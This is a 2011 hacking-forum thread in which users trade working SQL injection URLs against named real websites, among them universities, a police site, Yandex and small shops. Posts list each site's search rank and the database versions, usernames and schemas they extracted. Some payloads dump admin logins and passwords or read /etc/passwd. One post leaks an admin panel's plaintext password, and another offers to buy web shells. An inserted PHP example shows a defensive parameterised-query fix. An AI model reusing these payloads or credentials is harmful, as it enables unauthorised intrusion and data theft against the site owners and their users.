View full version: SQL Injections
TIC 1800, PR 5, Blind mysqlinj, traffic 7k+
Code:
http://www.vand.ru/index.php?country=64&sub=64+and(1)=1%23
version()>=5
_____________________
Traffic 7k. Blind mysqlinj
Code:
http://www.2avia.ru/?p=hot&rai=2+and+1=1--
_____________________
TIC 900, PR 4, 30k+ traffic
Code:
http://old.mastercity.ru/news/news.php?sel_id=20100705172731 and null+UNION SELECT 1,2,3,4,5,version()--+
4.1.20-log
Code:
http://www.shinamir.ru/index.php?pageId=92222{SQLINJ}
Database Version: 5.0.90-log
Database name: u261330_shinamir
User name: u261330_shinamir@10.9.11.74
Code:
http://www.tgkoleso.ru/index.php?pageId=4
Database Version: 4.0.26-log
Database name: udb4037
User name: Uwww4037S@localhost
Code:
http://www.eurofamily.ru/french/?pageId=8111{SQLINJ}
Database Version: 5.0.77-log
Database name: eurofamily
User name: eurofamily@localhost
nemaniak
17.09.2011, 19:46
engr.msstate.edu PR-5
Code:
http://www.engr.msstate.edu/media/news/index.php?newsID=-512+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12+--+
Code:
5.0.45:admin@localhost:webdb
pakistantimes.net PR-5
Code:
http://pakistantimes.net/pt/detail.php?newsId=-22412+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10,11+--+
Code:
5.0.77-log:ptdbuser@88.208.252.134:pakistantimes
themeparkreview.com PR-5
Code:
http://www.themeparkreview.com/parks/page.php?pageid=-368+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6+--+
Code:
5.1.40:freelance@localhost:themepar_parkphoto
(the answer is in the source, in the tag )
Code:
http://www.inter-shina.ru/index.php?pageId=1111{SQLINJ}
Database Version: 5.0.90-log
Database name: u261330_inter
User name: u261330_inter@10.9.11.74
sourcec0de
18.09.2011, 21:56
http://old914.fc-zenit.ru/info/Video.phtml?id=1'+and+extractvalue(0x3b,concat(0x3 b,(select+concat_ws(0x3a,version(),user()))))--+&video=1
Skofield
18.09.2011, 22:16
Code:
http://www2.utah.edu/podcast/indivAudiocast.php?acId=-217'+union+select+1,2,3,4,5,6,7,8,version(),0,11,1 2,13,14,15,16/*
Database Version: 4.0.17-standard-log
Database name: podcast
User name: podcast_web@able.cc.utah.edu
http://wcfcourier.com/app/collegeguide/profile.php?campus=7+union+select+1,2,3,4,5,6,7,8, 9,10,11,concat_ws(0x3a,version(),user(),database() ),13,14--
4.0.24-standard:wcfcourier@10.1.10.200:wcfcourier_com
http://www.avtokraska.ru/news.php?id=76111{SQLINJ}
PR 2 TIC 20
Database Version: 5.0.51a-24+lenny5
Database name: avtokraskaru_avtokraskaru
User name: avto_user@localhost
http://www.ttfinance.ru/news.php?id=4155111{SQLINJ}+
PR 4 TIC 160
Database Version: 5.0.90-log
Database name: u24363
User name: u24363@10.8.0.107
http://worldsale.com.ua/news.php?id=16111{SQLINJ}&id_n=1612
PR 0 TIC 0
Database Version: 5.1.57
Database name: worldsale
User name: worldsale@localhost
http://www.chocolate.rainford.ua/cgibin/news.php?id=83111{SQLINJ}
PR 2 TIC 30
Database Version: 5.0.87
Database name: rain_malbi
User name: rain@localhost
http://job.aviso.ua/news.php?id=346322{SQLINJ}
2 sites on board: PR 5 TIC 50 and PR 0 TIC 10
Version 5.0.67
http://goodmp3.org.ua/news.php?id=66911{SQLINJ}
PR 1 TIC 0
Database Version: 4.1.25-log
Database name: freemp3_slovo
User name: freemp3_slovo@192.168.1.7
http://www.automobile.com.ua/news.php?id=252222){SQLINJ}+
PR 1 TIC 0
Database Version: 4.0.27-standard-log
Database name: fastrunn_automobile
User name: fastrunn_root@localhost
http://vslovo.com.ua/news.php?id=2022{SQLINJ}
PR 1 TIC 0
Database Version: 5.1.43
Database name: vslovoco_vslovo
User name: vslovoco_vslovo@localhost
http://www.freemp3.org.ua/news.php?id=669222{SQLINJ}
Database Version: 4.1.25-log
Database name: freemp3_slovo
User name: freemp3_slovo@192.168.1.6
http://texnostar.org.ua/a-news/news.php?id=1401222{SQLINJ}
Database Version: 5.0.92-community-log
Database name: texnosta_texno
User name: texnosta_texno@localhost
P.S. I will accept shells with TIC 10-30 as a gift, or buy them (thanks)
http://www.kubinfo.ru/auto.php?mode=view&id=2181+union+select+name+from+users+where+id=user _id/*
http://spcformula.ru/auto/auto.php?id=1+union+select+name+from+users+where+i d=user_id/*
http://www.poderzhannye-tachki.ua/auto.php?id=2821+union+select+1,2,%27root%27,9,4,5 ,6,7,8,9,10--
The message you entered is too short. Lengthen your message to 4 characters.
http://www.sovazs.com/shownews.phtml?id=-1+union+select+1,2,3,4,password,login,7+from+acces s
TIC 150, PR 4
http://www.allbalances.ru/auto.php?id=19+or+1=%28SQL%20INJ%29%29--
Your message is too short. It must be at least 4 characters.
http://www.vel-es.ru/news.php?id=23522{SQLINJ}
Database Version: 5.0.70-log
Database name: gb_x_vel_es
User name: gb_x_vel_es@10.0.2.13
http://www.rubin69.ru/news.php?id=1922{SQLINJ}
Database Version: 5.0.26-log
Database name: rubin69
User name: rubin69@localhost
http://www.jetcharter.ru/new/news.php?id=65222{SQLINJ}
Database Version: 4.0.26
Database name: jetcharterru
User name: jetcharterru@62.213.73.13
http://www.astrakhanfm.ru/news/news.php?id=2552122{SQLINJ}
Looks like the official site of Russkoe Radio - Astrakhan
Database Version: 5.0.26-log
Database name: astrakhanru
User name: astrakhanru@localhost
Osstudio
19.09.2011, 23:16
http://www.sustainpack.com/news.php?id=-67%29+union+select+1,2,%28select%28@x%29from%28sel ect%28@x:=0x00%29,%28select%28null%29from%28inform ation_schema.columns%29where%28table_schema!=0x696 e666f726d6174696f6e5f736368656d61%29and%280x00%29i n%28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,t able_name,0x3a,column_name%29%29%29%29x%29,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19+--+
BD: db1081415_SustainPack
http://www.ajvengo.ru/news.php?id=43{SQLINJ}+
Database Version: 5.1.56-log
Database name: ajvengo_db
User name: ajvengo_user@localhost
http://elgaucho.ru/newsite/ru/news.php?id=150222{SQLINJ}+
Database Version: 5.1.41-log
Database name: elgaucho_elgaucho
User name: elgaucho_mysql@10.1.137.54
http://www.russianrugby.ru/news.php?Id=1002222{SQLINJ}+
Database Version: 5.1.56-log
Database name: russianr_site
User name: russianr_rugby@localhost
http://www.apc.ru/cgi-bin/news_full.cgi?id=102 6000 TIC
BLurpi^_^
20.09.2011, 19:52
Target: http://www.precisionbiologic.com/products/view_product.php?id=15'
Host IP: 209.68.16.133
Web Server: Apache/2.2.20
DB Server: MySQL >=5
Current User: precij4w_4@209.68.1.99
Sql Version: 5.0.91-log
PR=4
Target: http://promax.ie/view_product.php?id=12'
Host IP: 91.103.0.82
Web Server: Apache
Powered-by: PHP/5.2.4-2ubuntu5.17
DB Server: MySQL
Current User: promax@localhost
Sql Version: 5.0.51a-3ubuntu5.8-log
Current DB: promax
System User: promax@localhost
Host Name: lnxsrv01
Installation dir: /usr/
DB User: 'promax'@'localhost'
Data Bases: information_schema
promax
test_trackside
Target: http://psalmsoasis.com/view_product.php?id=8'
Host IP: 111.90.134.82
Web Server: Apache
Powered-by: PHP/5.2.17
DB Server: MySQL
Resp. Time(avg): 3535 ms
Current User: psalmsoa_db@localhost
Sql Version: 5.1.56-log
Current DB: psalmsoa_db
aydin-ka
20.09.2011, 21:26
TIC 750 PR 5 Traffic 1K
http://www.aen.ru/?page=brief&article_id=61491{SQLINJ}+
Current User: root@zvm14.host.ru
Sql Version: 5.0.87
Data Bases: information_schema
aen_ru
mysql
TIC 450 PR 4
http://yarnovosti.com/index.php?mod=news&cid=13&id=32645{SQLINJ}+
Current User: yarnovos_novosti@localhost
Sql Version: 5.0.51a-24+lenny5-log
Data Bases: information_schema
yarnovos_novost
http://thegrooveexperience.com/?side=gall&year=2009&month=-5+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user())--
5.0.91-log:thegroove:tanto@boscgi0503.eigbox.net
http://www.ruscombe.org/calendar_detail.php?id=10+UNION+SELECT+1,concat(us er_type,0x2e,user_username,0x3a,user_password),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+ from+users--
aydin-ka
21.09.2011, 19:48
TIC 275 PR 6
http://www.sevtolib.iuf.net/index.php?id=2{SQLINJ}+
Current User: bibl@localhost
Sql Version: 5.1.51
Data Bases: information_schema
bibl
Cennarios
22.09.2011, 12:19
Just a hosting provider.
http://www.qlayer.net/press_center/id-99+union+select+1,user(),3,4,5.htm
http://www.indstate.EDU/cirt/et/techenh/display_room.php?id=-2+union+select+1,2,3,version(),5,6,7,8,9--
PR 7 TIC 160
A US university.
there are tables tblusers, wksp_user, wksp_student
http://php.amnuts.com/index.php?do=view&id=14&file=class.madlibs.php
PR 3
DB's
- amnuts_php2
- information_schema
Osstudio
22.09.2011, 18:23
http://uslugi.yandex.ru/banki/ipoteka/search.xml?sum=3000000¤cy=1&period=4&restrictions=0®ion=-213'+and+1=0+union+select+1,2,3,4,vErsIon(),usEr() ,daTabase(),8,9,10,11,12,13,14,15,16+--+
Version: 5.01+lenny
User: yandex@localhost
Database: uslugi_ya
TIC: 250
PR: 0
http://www.mental-health-matters.com/index.php?option=com_content&view=article&id=171
PR 6
TIC 20
db: mentalhealthmatters
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: option=com_content&view=article&id=171 AND 2065=2065
aydin-ka
23.09.2011, 00:21
TIC 400 PR 5
http://www.chayka.org/article.php?id=3320{SQLINJ}+
Current User: dbo375381534@74.208.180.160
Sql Version: 5.0.91-log
Data Bases: information_schema
db375381534
http://www.shipsandports.org/Anews/moreheadlines.php?id=285-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4--
http://www.mediasoyuz.ru/news/index.php?id=932-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
DB: u230689
Osstudio
24.09.2011, 00:52
Code:
http://www.takagazete.com/kose_category.php?id=11+and+1=0+union+select+1,2,3 ,4,5,concat_ws%280x3a3a3a,version%28%29,user%28%29 ,database%28%29%29,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31--
P.S. Note the title
http://www.porlock.co.uk/members/index.php?id=-00121+union+select+user%28%29,2--
http://knl.ua/img/titul.jpg
http://knl.ua/business.php?cat=1%20and%201-2%20union%20select%201,concat_ws(0x3a,@@version,us er(),database(),@@version_compile_os),3,4,5,6--
5.0.51a-24+lenny5-log u_allkremenc@localhost allkremenc debian-linux-gnu
Code:
http://www.fosa.biz/wp-admin/admin.php?page=people&action=printable&event_id=-15+union+select+0,1,2,concat_ws(0x3a,user_login,us er_pass),4+from+wp_users--
Code:
http://www.surgabali.biz/daftar_tour.php?kategoriID=-53+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5--
Military theme
Code:
http://www.ak-47.us/AK47-FAQ.php?id=-148)+or+1+group+by+concat(@@version,floor(rand(0)* 2))+having+min(0)+or+1+--+1
TIC 10
PR 0
Shops
Code:
http://www.smartdesignworldwide.com/work/print.php?id=135+and+1=2+union+select+1,2,version( ),4,5,6,7,8,9,10,11,12
Current User: smart_dev@localhost
Sql Version: 5.0.45
Current DB: smart
System User: smart_dev@localhost
Host Name: smartdesignworldwide.com
Installation dir: /usr/
DB User: 'smart_dev'@'%'
Data Bases: information_schema
smart
TIC = not determined =(
PR = not determined =(
Code:
http://www.ruskinmoore.co.uk/cart/details.asp?ID=101356+and+1=1+union+select+1,2,3,c ount(pw),5,6,7,8,9,10,11,12,13,14,15,161,71,8,19+f rom+clients
DB Server: MSAccess
Resp. Time(avg): 910 ms
Web Root: c:\windows\system32\inetsrv\
There are loads of other UK shops on the same host
Code:
http://logowears.com/cart/landing.asp?ID=89+and+1=1+union+select+1,2,uUserna me,4,5,6,7,8,uPassword+from+tblusers
DB Server: MSAccess
Resp. Time(avg): 1465 ms
Web Root: C:\Windows\SysWOW64\inetsrv\
AHTNkiller
27.09.2011, 10:50
http://www.simka.by/shop.php?category=28&mode=detail&id=-1149%20UNION%20ALL%20SELECT%201,2,3,4,version%28%2 9,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
Code:
http://carmartlanka.com/sell.php?id=-1+union+select+1,2,concat_ws(0x3a,uid,username,pas sword),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28+from+tbl_admin
aydin-ka
27.09.2011, 23:59
TIC 20
PR 3
http://www.sizampskov.ru/news.php?id_new=99999+union+sel ect+1,2,3,4,5,concat_ws%280x3a,version%28%29,datab ase%28%29,us er%28%29%29,7,8,9--
Sql Version: 5.0.77
Data Bases: information_schema
sizampskov_sizam
PHP:
http://www.everestsports.com.au/headsweats/prod_det.php?recordID=-879+/*!UnIoN+SeLeCt*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17, 18,19,20,21--
version 5.1.56
Google PageRank: 6
Yandex CY: 30
Code:
http://www.epdlp.com/director.php?id=4048'+union+select+1,2,3,4,5,6,7,8 ,9,10,11,version(),user(),14,15,16,17,18,19,20+--+
ver. 5.0.45
aydin-ka
29.09.2011, 19:07
TIC 250 PR 4 Alexa Rank 246,434
http://www.nov osib.ru/market/site.php ?id=2166 &gid=99999999+UNION+SELECT+1,2,concat_ws(0x3a,user( ),version(),database()),4,5,6--
Data Bases: information_schema
novosib8_main
novosib8_mamba
novosib8_phpbb
winstrool
30.09.2011, 08:40
http://vrnplus.ru/street.php?id='-14'+union+select+1,concat_ws(0x3a,user(),version() ,database())+--+
betatron@v22.valuehost.ru:4.0.27-log:betatron
http://www.orencar.ru/orenburg/streets/street.php?id=-%CA'+union+select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5+--+
u44342@10.8.3.52:5.5.12-log:u44342_cars
Contex condoms with leaky protection
Italy
Output of the version and user
Code:
http://www.contex.lt/rus/link.php?lnk_id=999+UNION+ALL+SELECT+1,2,3,4,5,6,7 ,8,concat_ws(0x3a,user(),version()),10,11--
Current User: contex.lt@localhost
Sql Version: 5.1.33-log
Current DB: contex_lt
Data Bases: information_schema, contex_lt
TIC = 0
PR = 4
Ukraine
Code:
http://contex.ua/link.php?lnk_id=39+and+1=2+union+select+1,2,3,4,5, 6,7,8,version(),10,11
Current User: contex@localhost
Sql Version: 5.0.90
Current DB: contex
Data Bases: information_schema
ameshkov
bareks
bunker
contex
deltabank
elevator
ford
gallery2
inpack
krus
krz
ksit
moodle
musicmama
mysql
ranok
rdm
star-k
synergia
The databases listed above belong to these sites:
Code:
krz.com.ua
star-k.com.ua
www.ford.com.ua
www.ford.ua
www.inpack.com.ua
www.kale-bareks.com.ua
www.kruss.com.ua
www.kruss.kiev.ua
www.krz.com.ua
www.naboo.viaduk.net
www.ranok.kiev.ua
www.rdm.com.ua
www.rdm.ua
www.synergia.ua
www.thyssenkrupp-elevator.com.ua
TIC = 10
PR = 3
Bulgaria
Code:
http://bolgar.contex-condom.ru/link.php?lnk_id=49+and+1=2+union+select+1,2,3,4,5, 6,7,8,version(),10,11
Current User: u31847@10.8.1.182
Sql Version: 5.0.90-log
Current DB: u31847_bolgar
Data Bases: information_schema
u31847
u31847_2
u31847_bolgar
TIC and PR are both zero
Latvia
Code:
http://www.contex.lv/link.php?lnk_id=17+and+1=1+union+select+1,2,3,4,5, 6,7,8,version(),10,11
Current User: contex@system1.hostex.lv
Sql Version: 4.0.27
Current DB: contex
TIC = 0
PR = 4
http://computeremuzone.com/ficha.php?id=18 (60-80 users online)
ran it through havij, couldn't do it by hand... file_priv=y
vaddd said:
http://computeremuzone.com/ficha.php?id=18 (60-80 users online)
ran it through havij, couldn't do it by hand... file_priv=y
Young people these days aren't what they used to be =/ They leave everything to programs...
And really it's all simple
Code:
http://computeremuzone.com/ficha.php?id=9999+union+select+version(),2,3,4,5,6--
Current User: crisis@cgi1501.int.bizland.net
Sql Version: 5.0.91-log
Current DB: emuzonedb
Data Bases: information_schema
emuzonedb
eclipse92
01.10.2011, 13:40
http://www.dkggroup.com/main.php?id=121'
http://www.dkggroup.com/main.php?id=-121+union+all+select+1,group_concat(Username,0x3a, Password,0x3a,UserGroup),3,4,5+from+uvp_Users
TIC: 1600
Code:
http://www.solvex.ru/hot/list.php?uid=-22+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3--+
ver 5.1.39
db solvexmdb
user root@localhost
file_priv y, mq = on
TIC 850
my first one
http://www.chelsi.ru/comment.php?idart=-11364+union+%0A+select+1,2,concat_ws%280x3a,email, password%29,4,5,6+from+users+--+
Institution of the Russian Academy of Sciences, Institute for Biological Instrumentation
http://www.ibp-ran.ru/catalog.php?trid=-203%20and%201=2%20union%20select%201,2,3,4,5,conca t_ws(char(58),@@version,user(),database(),@@versio n_compile_os),7,8,9,10,11,12,13,14,15,16+--
4.0.27-log pse101@v27.valuehost.ru pse101 portbld-freebsd7.1
The vulnerability exists in the GET request http://www.bryansktel.ru/news/?idnews=121 because of insufficient filtering of the idnews variable.
select+concat(login,0x3a,password,0x3a,level)+from +admins+limit+0,1
winstrool
03.10.2011, 02:01
http://turkupon.ru/articles.php?root=1'+union+select+1,2,concat_ws(0x 3a,user(),version(),database()),4,5+--+
grafrru_turkupon@localhost:5.1.50-lk-log:grafrru_turkupon
http://www.fishe.ru/diler.php?id=-10'+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database())+--+
fisheru@localhost:5.0.26-lk-log:fisheru
http://kosmostom-omsk.ru/content.php?id=-21'+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user (),version(),database()),9,0+--+
stomkosmos@localhost:5.0.26-log:stomkosmos
http://leohaus.ru/object.php?id=-59'+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database()),6,7,8,9,0,11,12,13,14,15,16,17+--+
leohausru@localhost:5.0.26-log:leohausru
http://steklo55.ru/content.php?id=3'+and+(version()+like+'5%')+and(us er()+like+'steklo55ru%')+and+(database()+like+'ste klo55ru')+--+
http://art-reklama.com.ua/passport.php?id=-170+union+select+1,load_file(0x2f6574632f706173737 764),3,4,concat_ws(0x3a,user(),version(),database( )),(select(@x)from(select(@x:=0x00),(select(0)from (information_schema.columns)where(table_schema!=0x 696e666f726d6174696f6e5f736368656d61)and(0x00)in(@ x:=concat(@x,0x3c62723e,table_schema,0x2e,table_na me,0x3a,column_name))))x)+--+
art@localhost:5.1.58:art-reklama
Code:
http://kaluga.pizdec.net/downloadmp3/mp3.php?album_id=-1635978+union+Select+1,2,3,4,5,6,group_concat%28ta ble_name+separator+0x3a%29,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53,54,55,56,57,58,59+from+information_sc hema.tables+where+table_schema=0x7a697073--
version: 5.0.77
database: zips
user: zips@localhost
Code:
http://foroli4ka.org.ua/aforism/index.php?id=1+and+substring%28@@version,1,1%29=5 //true
PHP:
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,group_concat(column_name+sepa rator+%27%3Cbr%3E%27)+from+information_schema.colu mns+where+table_schema=%27kitanaru%27+and+table_na me=%27user_profile%27--+
version - 5.0.45
kitanaru@localhost
TIC - 20
PR - 3
good.god
05.10.2011, 15:06
Code:
http://www.easyincometoday.co.uk/shop/ViewItem.php?ItemID=1'+and+1=0+union+select+1,grou p_concat(version(),0x3a,database()),3,4,5,6,7,8,9, 10,11,12,13,14,15,16+--+
5.0.51a-3ubuntu5:easyincome
AHTNkiller
05.10.2011, 15:09
http://www.autodostavka.ru/index.php?id=729&model=-981%20UNION%20ALL%20SELECT%201,2,3,4,5,6,group_con cat%28username,password%29,8,9,10,11,12%20from%20r egusers
http://shownewstv.ru/taunew/index.php?id=5227-999.9+union+select+1,2,3,4,version(),6,7,8,user(), 10,database(),12,13,14,15,16,17--
5.1.49-1ubuntu8.1
shownews@localhost
DB: wwwshownewstvru
http://avtozapchasty.ru/shop/i.php?id=288821-999.9+union+select+1,2,version(),4,5,6,user(),8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
5.5.16-log 6
cck135@WIN-BZW07G9C3OB
Code:
http://faq.freecity.de/support/faq_showfaq.phtml?id=-85+union+select+1,version()+--+&katname=K%C3%BCndigung
4.0.24_Debian-10sarge2-log
pr4
alexa 384,252
Code:
http://www.salue.de/nachrichten/message.phtml?id=-14895+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws( 0x3a,version(),database(),user()),12,13,14,15,16,1 7,18,19,20,21+--+
pr 5
alexa 272,965
Code:
http://roston.cz/czechdjs/?section=karta&id=1+and+1=2+union+select+1,2,3,4,5,6,user(),0x61, 9,10,11,12,13,14,version(),database(),17,18,19+--+
there is also an opendir('foto/' . $_GET['id']), and the file inc-kalendar-10-2011.txt gets included.
kravch_v
07.10.2011, 21:23
GAZclub:
Code:
http://www.gazclub.ru/faq/?mess_id=-1+union+select+null,mysql.user.password,null,null+ from+mysql.user
u9884_2'@'10.8.1.198
PageRank - 0
Yandex TIC - 120
http://www.danielbank.kiev.ua/index.php?action=news&type=det&id=79{SQLINJ}
MySQL 5.2.2.
DataBase: danielbank
winstrool
10.10.2011, 18:28
Old School CMS 2010
root@vsevbanu.ru:5.0.51a-24+lenny4-log:vvb
http://www.vsevbanu.ru/post.php?id=-82+UnIon+selECt+1,concat_ws(0x3a,user(),version(), database()),(select(@x)from(select(@x:=0x00),(sele ct(0)from(information_schema.columns)where(table_s chema!=0x696e666f726d6174696f6e5f736368656d61)and( 0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e ,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10+--+
The vulnerability is present because the data in the ID parameter is not filtered
post.php
if(!empty($_GET['id'])){$id = $_GET['id'];}
else $id = 1;
$show = $_GET['show'];
// output the page contents;
$sql = "SELECT * FROM `pora` WHERE id = $id AND type = 'art'";
$result = mysql_query($sql);
$cont = mysql_fetch_object($result);
http://www.showbilet.ru/index.php?nav=1&page=3&id=-10%20and%201=2%20union%20select%201,concat_ws(char (58),@@version,user(),database(),@@version_compile _os),3,4,5,6,7,8,9,10--
4.0.27-log showbile@v27.valuehost.ru showbile portbld-freebsd7.1
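For the post.php fragment quoted above, an added example (not part of the thread and not the site's own code) of the same lookup with the id validated as an integer and bound as a query parameter. The function names `open_db`, `parse_id`, `fetch_article` and `handle`, the `body` column, the sample rows and the in-memory SQLite stand-in for the `pora` table are assumptions made so the file runs on its own.

```php
<?php
declare(strict_types=1);

// Added example: hardened form of the post.php lookup quoted in the thread.
// The original builds "... WHERE id = $id ..." from $_GET['id'], so any text
// after the number is parsed as SQL. Here the id is validated as a positive
// integer and sent as a bound parameter, never as part of the SQL text.

// Assumption: PDO replaces the mysql_* functions (removed in PHP 7). An
// in-memory SQLite database with constructed rows stands in for the real
// pora table so the file runs offline. With MySQL the DSN would be
// "mysql:host=...;dbname=...;charset=utf8mb4", PDO::ATTR_EMULATE_PREPARES
// would be set to false, and the account would be limited to SELECT on this
// schema (not root, no FILE privilege).
function open_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec("CREATE TABLE pora (id INTEGER PRIMARY KEY, type TEXT, body TEXT)");
    $pdo->exec("INSERT INTO pora (id, type, body) VALUES
        (1, 'art', 'default article'),
        (82, 'art', 'article 82'),
        (83, 'news', 'not an article')");
    return $pdo;
}

// Returns the id as an int, or null when the value is not a plain positive
// integer (trailing SQL, quotes, arrays from id[]=..., out-of-range numbers).
function parse_id($raw): ?int
{
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// The SQL text is constant; only the integer travels as data.
function fetch_article(PDO $pdo, int $id): ?object
{
    $stmt = $pdo->prepare("SELECT id, type, body FROM pora WHERE id = :id AND type = 'art'");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_OBJ);
    return $row === false ? null : $row;
}

// Returns [HTTP status, body]. $query plays the role of $_GET.
function handle(PDO $pdo, array $query): array
{
    if (!isset($query['id']) || $query['id'] === '') {
        $id = 1;                       // same default as the original page
    } else {
        $id = parse_id($query['id']);
        if ($id === null) {
            return [400, 'bad id'];    // reject instead of guessing a value
        }
    }
    $row = fetch_article($pdo, $id);
    return $row === null ? [404, 'not found'] : [200, $row->body];
}

if (PHP_SAPI === 'cli') {
    $pdo = open_db();
    // Constructed inputs: valid ids, a non-article row, and malformed values.
    $constructed = [
        [],
        ['id' => '82'],
        ['id' => '83'],
        ['id' => '-82 union select 1,2,3'],
        ['id' => "82' or '1'='1"],
        ['id' => ['82']],
    ];
    foreach ($constructed as $q) {
        [$status, $body] = handle($pdo, $q);
        printf("%-36s => %d %s\n", json_encode($q), $status, $body);
    }
}
```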
aydin-ka
10.10.2011, 21:49
TIC 20 PR 2
http://weldteam.ru/pages.php?id=999999/*++*/union/*++*/select/*++*/concat_ws%280x3a,user%28%29,version%28%29,database %28%29%29,2,3+--+
dexx@localhost:5.0.51a-24+lenny5:dex
nemaniak
11.10.2011, 01:24
insanely-great.com PR-5
Code:
www.insanely-great.com/news.php?id=-11189+union+select+1,2,3,concat_ws(0x3a,version(), user(),database()),5,6,7,8,9,10,11,12,13,14,15,16, 17,18+--+
Code:
5.0.77-log:flamini_flaminio@216.14.208.109:flamini_igm
innovid.com PR-5
Code:
http://www.innovid.com/news.php?itemID=52+and+5=substring((SELECT+version ()),1,1)+--+
library.uni-altai.ru TIC-180
Code:
library.uni-altai.ru/FullNews/shownew.php?num=-1253+union+select+1,2,3,concat_ws(0x3a,version(),u ser(),database()),5,6,7,8,9,10,11+--+
Code:
5.1.49-3-log:serg@localhost:libnews
Code:
http://www.nov-mvd.ru/GUVDpoNSO/Statistika?blogs2_id=552+limit+0+union+select+1,2, concat_ws%280x3a,user%28%29,version%28%29,database %28%29%29,4,5,6
Web Server: Apache/2.0.63-lk.d (Unix) mod_ssl/2.0.63-lk.d OpenSSL/0.9.8g mod_dp20/0.99.2 mod_python/3.3.1 Python/2.5.1 mod_ruby/1.2.6 Ruby/1.8.6(2007-09-24)
DB Server: MySQL
Current DB: notixshoru_mvd
Sidarovich1975
11.10.2011, 15:47
Code:
http://www.zebra.nsk.ru/index.php?page=lotinfo&id=-9277+union+select+1,2,concat_ws(0x3a3a3a,user(),ve rsion(),database()),4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28+--+
zebransk_base@localhost:::5.1.50-rel11.4-log:::zebra777_base
aydin-ka
11.10.2011, 16:34
TIC 800 PR 5
http://vkirove.ru/catalog/index/?oid=-53%27%20UNION%20SELECT%201,2,CONCAT_ws%280x3a,user %28%29,version%28%29,database%28%29%29,4,5+--+
vns@localhost:5.1.53-log:www
TIC 160 PR 4
http://www.printmagazine.ru/market.php?id=-39+union+select+concat_ws%280x3a,user%28%29,databa se%28%29,version%28%29%29,2,3+--+
printmag@localhost:wwwprintmagazinr:4.1.25-log
TIC 30 PR 3
http://www.nostratic.ru/index.php?page=9999999+union+select+1,2,3,concat_w s%280x3a,user%28%29,version%28%29,database%28%29%2 9,5,6,7+--+
200148610@localhost:4.1.25-log:db00148610
TIC 30 PR 3
http://www.feromon.ru/?fm=0&categoryID=111%20and%200%20union%20select%201,conc at_ws%280x3a,user%28%29,version%28%29,database%28% 29%29,3+--+
u25499@10.8.0.155:5.0.90-log:u25499
I don't know where to post admin panels, so I posted it here!
Code:
http://www.konkir.ru/
mods, if I've just missed it, sorry, move it to where it should be!
root:market2004
aydin-ka
12.10.2011, 17:34
TIC 1000 PR 4
http://maxybaby.net.ua/index.php?loc=detskie-stihi-i-pesenki&stih=120%20and%201=0%20union%20select%201,2,3,4,5, concat_ws%280x3a,user%28%29,database%28%29,version %28%29%29+--+
maxybaby_root@localhost:maxybaby_maximka:5.0.51a-24+lenny5 "4"
Dedicated to those indifferent to the RU auto industry...
www.la[g]da.ru
PR/TYC = 6/1700
DB: Oracle
Databases
Code:
http://www.la[g]da.ru/carco[g]lors.php?ba[g]se_id=6295171 AND ASCII(SUBSTR((SELECT NVL(CAST(COUNT(DISTINCT(OWNER)) AS VARC[g]HAR(4000)),CHR(32)) FROM SYS.ALL_TABLES),1,1)) > 51
Tables
Code:
http://www.la[g]da.ru/ca[g]rcolors.php?ba[g]se_id=6295171 AND ASCII(SUBS[g]TR((SELECT NVL(CAST(TABLE_NAME AS VARCHAR(4000)),CHR(32)) FRO[g]M (SELECT TABLE_NAME,ROWNUM AS LIMIT FROM SYS.ALL_TABLES WHERE OWNER=CHR(68)||CHR(83)||CHR(79)) WHERE LIMIT=4),6,1)) = 68
Columns
Code:
http://www.la[g]da.ru/carco[g]lors.php?ba[g]se_id=6295171 AND ASCII(SUBSTR((SEL[g]ECT NVL(CAST(COUNT(COLUMN_NAME) AS VARCHAR(4000)),CHR(32)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=CHR(68)||CHR(90)||CHR(79)||CHR(95)||CHR (85)||CHR(83)||CHR(69)||CHR(82)),1,1)) > 48
PHP:
databases[9]:
CTXSYS
DSO
nemaniak
13.10.2011, 01:55
willkommen-tv.at PR-5
Code:
http://www.willkommen-tv.at/artikel.php?id=8+and+1=2+union+select+1,2,3,4,5,co ncat_ws(0x3a,version(),user(),database()),7,8,9+--+
Code:
4.0.27inode:wi000142_0001@nat.ubh.inode.at:wi00014 2_0001
netporn.nl alexa-34k
